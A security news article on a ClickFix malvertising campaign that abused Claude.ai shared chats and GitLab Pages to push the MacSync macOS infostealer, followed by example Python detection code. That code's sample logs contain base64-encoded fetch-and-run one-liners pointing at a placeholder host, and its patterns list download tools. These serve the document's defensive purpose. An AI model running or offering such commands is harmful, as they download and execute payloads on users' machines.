Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions
By Abinaya
June 18, 2026
Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions.
According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness.
The operation marks a significant evolution in ClickFix tactics, shifting from traditional malicious hosting to trusted platforms like Claude.ai.
The campaign initially relied on GitLab Pages, using over 90 malicious subdomains hosted under the trusted *.gitlab.io domain.
These pages impersonated popular AI developer tools, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains.
By leveraging Google Ads, threat actors targeted users actively searching for these tools, increasing the likelihood of interaction from technically skilled individuals.
ClickFix attacks rely on tricking users into manually executing malicious commands. In this campaign, victims were instructed to copy and paste terminal or PowerShell commands under the pretense of installing or fixing software.
Claude Shared Chats Abused for ClickFix Attacks
This technique bypasses many traditional security controls because the user unknowingly executes the payload. The campaign escalated significantly in May 2026, when attackers pivoted to abusing Claude.ai’s shared chat feature.
Claude Malvertising Campaign Infection Chain (Source: TrendMicro)
Instead of directing victims to suspicious domains, malicious ads redirected users to legitimate Claude.ai shared chat URLs. These pages appeared trustworthy, effectively bypassing browser warnings, URL inspection, and Safe Browsing protections.
Once on the page, victims encountered fake support conversations impersonating entities such as Apple Support or development teams.
These chats provided step-by-step instructions for opening a terminal and executing a command. The command typically included a base64-encoded script that, once decoded, fetched a second-stage payload.
Top 20 Countries Targeted by the Campaign (Source: TrendMicro)
Analysis revealed that the payload delivered the MacSync infostealer, which targets macOS systems. The malware collects browser credentials, cookies, SSH keys, and cryptocurrency wallet data, then exfiltrates them to attacker-controlled servers.
Notably, the malware includes a check for Russian keyboard layouts, likely to avoid infecting systems in CIS regions.
The campaign’s geographic targeting was heavily concentrated in the Asia-Pacific region, which accounted for over 67 percent of victims.
“Running Claude Code on Mac” – A Shared Chat Posing as Apple Support (Source: TrendMicro)
Taiwan alone represented more than 30 percent of observed traffic, followed by Japan and Singapore. Later waves expanded targeting to countries including India, France, and Italy, indicating ongoing optimization of ad targeting strategies.
TrendAI researchers observed at least 45 malicious Claude.ai shared chat instances in early stages, increasing to over 60 in later waves.
This shift to trusted infrastructure removes many traditional detection signals, leaving user awareness as the primary defense.
Top 10 Countries by Confirmed Victim Interactions (Source: TrendMicro)
Following responsible disclosure, Anthropic took action by banning the malicious accounts, removing harmful shared chats, and implementing additional safeguards to prevent abuse of the feature.
Security experts warn that this campaign highlights a broader trend where attackers weaponize legitimate platforms to evade detection. As AI tools become more embedded in developer workflows, such abuse is expected to increase.
Organizations are advised to educate users about ClickFix-style attacks, monitor unusual command execution, and deploy endpoint detection solutions.
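As an added illustration of the "monitor unusual command execution" advice (example code written for this page, not TrendMicro's or the article's own), the following Python scores process command lines for the ClickFix chain described above: an inline base64 decode, its output piped into an interpreter, and a decoded script that fetches a second stage. The regexes, the sample telemetry and the example.invalid URL are assumptions, constructed for the example.

```python
import base64
import binascii
import re

# Three signals from the article's ClickFix chain. The regexes are assumptions
# written for this example, not a vendor's detection rules.
B64_DECODE = re.compile(r"base64\s+(-d|-D|--decode)\b|-[Ee]nc(odedCommand)?\b")
INTERPRETER = re.compile(r"\|\s*(sh|bash|zsh|python3?|perl)\b")
FETCH = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(cmdline):
    """Decode every base64-looking token as UTF-8 and as UTF-16LE (PowerShell -enc)."""
    texts = []
    for tok in B64_BLOB.findall(cmdline):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like base64 but is not; skip it
        texts.append(raw.decode("utf-8", "replace"))
        texts.append(raw.decode("utf-16-le", "replace"))
    return texts


def assess(cmdline):
    """Score one process command line; returns (score, reasons)."""
    reasons = []
    if B64_DECODE.search(cmdline):
        reasons.append("inline base64 decode")
    if INTERPRETER.search(cmdline):
        reasons.append("output piped into an interpreter")
    if any(FETCH.search(t) for t in decode_blobs(cmdline)):
        reasons.append("decoded content fetches a second stage")
    return len(reasons), reasons


def triage(cmdlines, threshold=2):
    """Return (score, cmdline) pairs at or above threshold, highest first."""
    scored = [(assess(c)[0], c) for c in cmdlines]
    return sorted(((s, c) for s, c in scored if s >= threshold), reverse=True)


# Constructed sample telemetry (not from the article); the fetch target is a placeholder.
STAGE2 = "curl -fsSL https://example.invalid/stage2 | sh"
SAMPLE_LOGS = [
    "base64 -d cert.b64 > cert.pem",  # benign admin use of base64
    "echo %s | base64 -d | bash" % base64.b64encode(STAGE2.encode()).decode(),
    "powershell -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode(),
    "git clone https://gitlab.com/example/repo.git",  # benign developer activity
]

if __name__ == "__main__":
    for score, cmd in triage(SAMPLE_LOGS):
        print(score, assess(cmd)[1], cmd[:60])
```

A single base64 decode (the certificate line) scores 1 and is not surfaced; the macOS one-liner and the PowerShell encoded command reach the threshold because the decoded blob itself contains the downloader.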
Users should avoid installing software via search ads, verify URLs carefully, and never execute commands from untrusted sources.